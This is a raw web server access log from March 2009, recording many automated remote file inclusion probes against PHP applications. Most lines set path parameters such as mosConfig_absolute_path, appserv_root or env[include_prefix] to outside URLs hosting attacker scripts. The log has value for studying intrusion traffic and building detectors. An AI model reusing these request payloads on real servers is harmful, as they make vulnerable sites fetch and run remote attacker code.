64.135.71.20 - - [11/Mar/2009:09:06:20 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
64.135.71.20 - - [11/Mar/2009:09:06:20 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
64.135.71.20 - - [11/Mar/2009:09:06:21 -0500] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
64.135.71.20 - - [11/Mar/2009:09:06:21 -0500] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
62.44.70.253 - - [11/Mar/2009:09:08:16 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:09:08:16 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:09:08:22 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:09:08:22 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:09:09:31 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:09:09:31 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:09:09:36 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
62.44.70.253 - - [11/Mar/2009:09:09:36 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
69.65.122.96 - - [11/Mar/2009:09:13:41 -0500] "GET ///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:13:41 -0500] "GET /logs/access_log.1232150400///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:13:42 -0500] "GET /logs///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 200 181181 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:13:46 -0500] "GET ///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:13:46 -0500] "GET /logs/access_log.1232150400///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:13:46 -0500] "GET /logs///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 200 181181 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:13:48 -0500] "GET /logs/access_log.1234569600///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:13:49 -0500] "GET ///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:13:50 -0500] "GET /logs/access_log.1232150400///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:13:50 -0500] "GET /logs///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 200 181181 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:14:18 -0500] "GET ///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:14:18 -0500] "GET /logs/access_log.1234569600///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:14:19 -0500] "GET /logs///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 200 181181 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:15:37 -0500] "GET /logs/access_log.1232150400///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:15:37 -0500] "GET ///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:15:37 -0500] "GET /logs///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 200 181181 "-""Mozilla/5.0"
69.65.122.96 - - [11/Mar/2009:09:15:53 -0500] "GET /logs/access_log.1234569600///?_zb_path=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
209.188.21.248 - - [11/Mar/2009:09:18:05 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
209.188.21.248 - - [11/Mar/2009:09:18:05 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
194.177.224.21 - - [11/Mar/2009:09:19:40 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laneviera.com/id.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
194.177.224.21 - - [11/Mar/2009:09:19:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laneviera.com/id.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
194.177.224.21 - - [11/Mar/2009:09:20:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laneviera.com/id.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
194.177.224.21 - - [11/Mar/2009:09:20:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laneviera.com/id.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
139.179.10.6 - - [11/Mar/2009:09:33:47 -0500] "GET /?path%5Bdocroot%5D=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
139.179.10.6 - - [11/Mar/2009:09:33:49 -0500] "GET /logs/?path%5Bdocroot%5D=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 181175 "-""libwww-perl/5.803"
209.85.105.25 - - [11/Mar/2009:09:35:49 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://yeahfine.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.85.105.25 - - [11/Mar/2009:09:35:49 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://yeahfine.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.85.105.25 - - [11/Mar/2009:09:35:49 -0500] "GET /logs/access_log.1230163200/bookmark4u/lostpasswd.php?env[include_prefix]=http://yeahfine.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.112.227.88 - - [11/Mar/2009:09:41:14 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
212.112.227.88 - - [11/Mar/2009:09:41:15 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
77.221.130.17 - - [11/Mar/2009:09:44:21 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
77.221.130.17 - - [11/Mar/2009:09:44:21 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
207.226.88.17 - - [11/Mar/2009:09:52:58 -0500] "GET /logs/errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:09:52:58 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:09:52:58 -0500] "GET /errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:09:52:58 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
219.117.223.106 - - [11/Mar/2009:09:56:08 -0500] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.0" 404 290 "-""libwww-perl/5.36"
219.117.223.106 - - [11/Mar/2009:09:56:09 -0500] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.0" 404 285 "-""libwww-perl/5.36"
70.38.11.214 - - [11/Mar/2009:10:02:34 -0500] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 304 "-""libwww-perl/5.814"
70.38.11.214 - - [11/Mar/2009:10:02:35 -0500] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.814"
70.38.11.214 - - [11/Mar/2009:10:03:02 -0500] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 304 "-""libwww-perl/5.814"
70.38.11.214 - - [11/Mar/2009:10:03:02 -0500] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.814"
61.110.18.100 - - [11/Mar/2009:10:03:09 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.110.18.100 - - [11/Mar/2009:10:03:09 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.110.18.100 - - [11/Mar/2009:10:03:09 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
61.110.18.100 - - [11/Mar/2009:10:03:43 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.110.18.100 - - [11/Mar/2009:10:03:43 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.110.18.100 - - [11/Mar/2009:10:03:43 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
61.110.18.100 - - [11/Mar/2009:10:03:51 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.110.18.100 - - [11/Mar/2009:10:03:51 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.110.18.100 - - [11/Mar/2009:10:03:51 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:03:57 -0500] "GET ///apboard/portal.php/add.php?APB_rp=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:03:57 -0500] "GET /logs///apboard/portal.php/add.php?APB_rp=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:03:57 -0500] "GET /logs/access_log.1233619200///apboard/portal.php/add.php?APB_rp=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:03:57 -0500] "GET /logs/access_log.1232409600///apboard/portal.php/add.php?APB_rp=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:04:11 -0500] "GET /logs/access_log.1232928000///apboard/portal.php/add.php?APB_rp=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:10:04:25 -0500] "GET ///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:10:04:25 -0500] "GET /logs/access_log.1232409600///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:10:04:25 -0500] "GET /logs/access_log.1233619200///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:10:04:25 -0500] "GET /logs///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
70.38.11.214 - - [11/Mar/2009:10:04:26 -0500] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 304 "-""libwww-perl/5.814"
70.38.11.214 - - [11/Mar/2009:10:04:26 -0500] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.814"
85.18.117.101 - - [11/Mar/2009:10:04:29 -0500] "GET /logs/access_log.1232928000///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:10:04:38 -0500] "GET ///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:10:04:38 -0500] "GET /logs///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:10:04:38 -0500] "GET /logs/access_log.1233619200///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:10:04:52 -0500] "GET /logs/access_log.1232928000///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.132.184.88 - - [11/Mar/2009:10:05:23 -0500] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
66.132.184.88 - - [11/Mar/2009:10:05:23 -0500] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.132.184.88 - - [11/Mar/2009:10:05:29 -0500] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
66.132.184.88 - - [11/Mar/2009:10:05:29 -0500] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
66.132.184.88 - - [11/Mar/2009:10:05:29 -0500] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.132.184.88 - - [11/Mar/2009:10:05:29 -0500] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
61.110.18.100 - - [11/Mar/2009:10:05:47 -0500] "GET /logs/access_log.1232841600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
61.110.18.100 - - [11/Mar/2009:10:05:52 -0500] "GET /logs/access_log.1232841600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
61.110.18.100 - - [11/Mar/2009:10:05:52 -0500] "GET /logs/access_log.1232841600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:06:25 -0500] "GET ///apboard/portal.php/add.php?APB_rp=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:06:25 -0500] "GET /logs/access_log.1233619200///apboard/portal.php/add.php?APB_rp=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:06:26 -0500] "GET /logs///apboard/portal.php/add.php?APB_rp=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:06:26 -0500] "GET /logs/access_log.1232409600///apboard/portal.php/add.php?APB_rp=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:06:36 -0500] "GET /logs/access_log.1232928000///apboard/portal.php/add.php?APB_rp=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:10:06:39 -0500] "GET /logs/access_log.1232409600///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
70.58.175.166 - - [11/Mar/2009:10:07:08 -0500] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 304 "-""libwww-perl/5.812"
70.58.175.166 - - [11/Mar/2009:10:07:08 -0500] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
70.58.175.166 - - [11/Mar/2009:10:07:08 -0500] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 304 "-""libwww-perl/5.812"
70.58.175.166 - - [11/Mar/2009:10:07:08 -0500] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
216.168.37.169 - - [11/Mar/2009:10:07:23 -0500] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 304 "-""libwww-perl/5.801"
216.168.37.169 - - [11/Mar/2009:10:07:23 -0500] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 304 "-""libwww-perl/5.801"
216.168.37.169 - - [11/Mar/2009:10:07:23 -0500] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.801"
216.168.37.169 - - [11/Mar/2009:10:07:23 -0500] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.801"
216.168.37.169 - - [11/Mar/2009:10:07:40 -0500] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 304 "-""libwww-perl/5.801"
216.168.37.169 - - [11/Mar/2009:10:07:40 -0500] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.801"
81.12.13.152 - - [11/Mar/2009:10:08:43 -0500] "GET /logs///apboard/portal.php/add.php?APB_rp=http://www.lazar.ru/manager/processors/copyright.txt?%0D?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
81.12.13.152 - - [11/Mar/2009:10:08:43 -0500] "GET ///apboard/portal.php/add.php?APB_rp=http://www.lazar.ru/manager/processors/copyright.txt?%0D?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
66.7.212.241 - - [11/Mar/2009:10:09:23 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.freewebtown.com/fcorp/id3.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.820"
66.7.212.241 - - [11/Mar/2009:10:09:23 -0500] "GET /logs/access_log.1234224000//config/dbutil.bck.php?confdir=http://www.freewebtown.com/fcorp/id3.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.820"
66.7.212.241 - - [11/Mar/2009:10:09:23 -0500] "GET //config/dbutil.bck.php?confdir=http://www.freewebtown.com/fcorp/id3.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.820"
66.7.212.241 - - [11/Mar/2009:10:10:44 -0500] "GET /logs/access_log.1233014400//config/dbutil.bck.php?confdir=http://www.freewebtown.com/fcorp/id3.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.820"
66.7.212.241 - - [11/Mar/2009:10:10:49 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://www.freewebtown.com/fcorp/id3.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.820"
66.7.212.241 - - [11/Mar/2009:10:12:49 -0500] "GET /logs/access_log.1234656000//config/dbutil.bck.php?confdir=http://www.freewebtown.com/fcorp/id3.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.820"
66.7.212.241 - - [11/Mar/2009:10:12:49 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://www.freewebtown.com/fcorp/id3.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.820"
66.7.212.241 - - [11/Mar/2009:10:12:49 -0500] "GET /logs/access_log.1232928000//config/dbutil.bck.php?confdir=http://www.freewebtown.com/fcorp/id3.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.820"
66.7.212.241 - - [11/Mar/2009:10:12:49 -0500] "GET /logs/access_log.1233619200//config/dbutil.bck.php?confdir=http://www.freewebtown.com/fcorp/id3.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.820"
66.7.212.241 - - [11/Mar/2009:10:12:57 -0500] "GET /logs/access_log.1233187200//config/dbutil.bck.php?confdir=http://www.freewebtown.com/fcorp/id3.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.820"
209.85.105.25 - - [11/Mar/2009:10:15:13 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://yeahfine.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.85.105.25 - - [11/Mar/2009:10:15:13 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://yeahfine.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
209.85.105.25 - - [11/Mar/2009:10:15:13 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://yeahfine.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
209.85.105.25 - - [11/Mar/2009:10:15:54 -0500] "GET /logs/access_log.1233014400//modules/vwar/admin/admin.php?vwar_root=http://yeahfine.freehostia.com/priv8/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:17:03 -0500] "GET //?site_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.823"
77.91.201.31 - - [11/Mar/2009:10:17:04 -0500] "GET /logs//?site_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 181180 "-""libwww-perl/5.823"
78.151.161.24 - - [11/Mar/2009:10:17:19 -0500] "GET /?site_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
78.151.161.24 - - [11/Mar/2009:10:17:21 -0500] "GET /logs/?site_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 181175 "-""libwww-perl/5.805"
77.91.201.31 - - [11/Mar/2009:10:18:47 -0500] "GET //write.php?dir=http://www.stormpages.com/cong/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:18:47 -0500] "GET /logs/access_log.1231286400//write.php?dir=http://www.stormpages.com/cong/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:18:48 -0500] "GET /logs//write.php?dir=http://www.stormpages.com/cong/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:19:12 -0500] "GET /logs/access_log.1231804800//write.php?dir=http://www.stormpages.com/cong/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:19:57 -0500] "GET /logs/access_log.1234569600//write.php?dir=http://www.stormpages.com/cong/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:19:57 -0500] "GET //write.php?dir=http://www.stormpages.com/cong/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:19:57 -0500] "GET /logs/access_log.1231804800//write.php?dir=http://www.stormpages.com/cong/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:10:19:57 -0500] "GET /logs//write.php?dir=http://www.stormpages.com/cong/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:10:20:35 -0500] "GET ///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
